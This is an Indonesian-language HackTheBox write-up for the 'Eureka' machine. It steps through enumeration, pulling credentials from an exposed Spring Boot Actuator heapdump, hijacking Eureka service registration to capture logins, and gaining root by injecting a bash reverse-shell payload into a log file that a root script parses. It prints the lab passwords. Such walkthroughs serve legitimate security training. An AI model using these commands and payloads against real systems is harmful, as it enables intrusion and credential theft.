
Daftar Isi
Writeup HTB Eureka ini membahas mesin Eureka dari platform HackTheBox yang berjalan di sistem operasi Linux dengan tingkat kesulitan Hard.
Informasi Umum Machine
- Nama: Eureka
- Platform: HackTheBox
- IP: 10.10.11.66
- OS: Linux
- Tingkat Kesulitan: Hard
- Kategori: Web Exploitation, Misconfiguration, Privilege Escalation
Enumeration
Pada tahap awal enumeration untuk HackTheBox Eureka, kita fokus pada scanning port dan eksplorasi HTTP menggunakan nmap dan dirsearch.
Nmap Scan
nmap -sCV -p- -T4 10.10.11.66 -oA eureka_fullscan
Hasil menunjukkan port 22 (SSH) dan 80 (HTTP) terbuka.
/etc/hosts
10.10.11.66 eureka.htb furni.htb
Dirsearch / Gobuster
dirsearch -u http://furni.htb -e php,html,txt -t 50
Menemukan endpoint penting: /actuator, /actuator/env, dan /actuator/heapdump
Eksploitasi
Eksploitasi pada HTB Linux Hard seperti Eureka ini menunjukkan pentingnya memahami celah dari konfigurasi default Spring Boot Actuator.
1. Download Heap Dump
Heapdump dapat diakses via:
http://furni.htb/actuator/heapdump
2. Analisis Heap Dump
Gunakan perintah:
strings heapdump.hprof | grep -Ei 'password|secret|token'
Hasil:
{password=0sc@r190_S0l!dP@sswd, user=oscar190}
3. SSH sebagai Oscar
ssh oscar190@furni.htb
Password: 0sc@r190_S0l!dP@sswd
4. Cari file konfigurasi
cat /var/www/web/Eureka-Server/target/classes/application.yaml
Hasil:
username: EurekaSrvr
password: 0scarPWDisTheB3st
5. Register Service Palsu ke Eureka
curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{...}'
6. Jalankan Listener
nc -nlvp 8081
Dapatkan kredensial:
Username: miranda.wise@furni.htb
Password: IL!veT0Be&BeT0L0ve
7. SSH sebagai Miranda
ssh miranda.wise@furni.htb
Privilege Escalation
1. Cek proses milik root
ps -ef | grep log_analyse.sh
2. Temukan file script
find / -name log_analyse.sh
Hasil: /opt/log_analyse.sh
3. Payload Reverse Shell
rm /var/www/web/user-management-service/log/application.log
echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/10.10.14.149/1337 0>&1)]' > /var/www/web/user-management-service/log/application.log
4. Listener
nc -nlvp 1337
Setelah beberapa saat, shell root masuk.
Root Flag
cat /root/root.txt
β Root Flag berhasil diperoleh.
Kesimpulan
Dengan mengikuti writeup HTB Eureka ini, diharapkan pembaca bisa memahami pendekatan teknis untuk menyelesaikan machine tingkat lanjut di HackTheBox, khususnya kategori HTB Linux Hard.
Machine Eureka dari HackTheBox menguji kemampuan dalam melakukan enumeration tingkat lanjut, eksploitasi konfigurasi Spring Boot Actuator, serta privilege escalation melalui log analyzer script.
Jika Anda mencari tantangan kompleks di HTB kategori Linux, Eureka sangat direkomendasikan untuk mengasah keterampilan real-world exploitation.
